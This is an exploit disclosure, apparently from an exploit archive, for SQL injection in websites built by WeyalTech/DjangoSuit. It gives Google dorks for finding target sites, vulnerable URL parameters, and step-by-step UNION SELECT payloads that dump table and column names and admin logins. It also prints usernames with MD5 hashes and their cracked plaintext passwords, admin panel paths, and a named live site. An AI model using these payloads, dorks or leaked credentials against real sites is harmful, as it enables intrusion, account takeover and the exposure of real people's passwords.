#################################################################################################
# Exploit Title : Designed By WeyalTech Developed By DjangoSuit Company SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 04/07/2018
# Vendor Homepages : weyaltech.com ~ djangosuit.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Another Title : Designed by WeyalTech DjangoSuit Web Development Company Afghanistan SQL Injection Vulnerability
# Google Dorks :
intext:''Designed by WeyalTech''
intext:''Copyright © 2013 DjangoSuit.com''
intext:''Developed by DjangoSuit.com''
# Exploits :
/fullstory.php?id=[SQL Inj]
/images.php?im_album_id=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj]
/category.php?CatID=[ID-Number]&limit=[ID-Number]&nxt=[SQL Inj]
/images.php?im_album_id=[SQL Inj]
/category.php?CatID=[SQL Inj]
/videos.php?vidcat=[SQL Inj]
/video_fullstory.php?vidid=[SQL Inj]
Below is the Manually SQL Injection Attack Scenario =>
Check Version of the Database Information =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--%20-
Check Table Names of the Database Information =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_schema=database()--%20-
Check Column + Table Name of the Database Information =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=0x7573657273--%20-
Check Administrators Owners Login Name and Password Information =>
127.0.0.1/fullstory.php?id=-68456+union+select+1,2,group_concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
admin:127498072c4615a301b5695af88ad47c
Samiullah Elam:e3fb7e8333d762d2f19ae811adbc6619
Gul-Sarai1:87a49a29def42b847f958deee851e6bf
Farid-Matoonwal:c8184106e280eeade72d27d99b32433f
127498072c4615a301b5695af88ad47c MD5 : weyaleya4Dol
e3fb7e8333d762d2f19ae811adbc6619 MD5 : Bator-Zwan
87a49a29def42b847f958deee851e6bf MD5 : De-Zra-Tasal1
c8184106e280eeade72d27d99b32433f MD5 : Rohi-Baba
Administration Control Panel Paths =>
/cp/login.php
/admin/login/?next=/admin/
#################################################################################################
# Example Site => rohi.af/fullstory.php?id=68456%27 => [ Proof of Concept ] => archive.is/xJm1D
# SQL Database Errors =>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
You're seeing this error because you have DEBUG = True in your Django settings file.
Change that to False, and Django will display a standard page generated by the handler for this status code. #68456
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################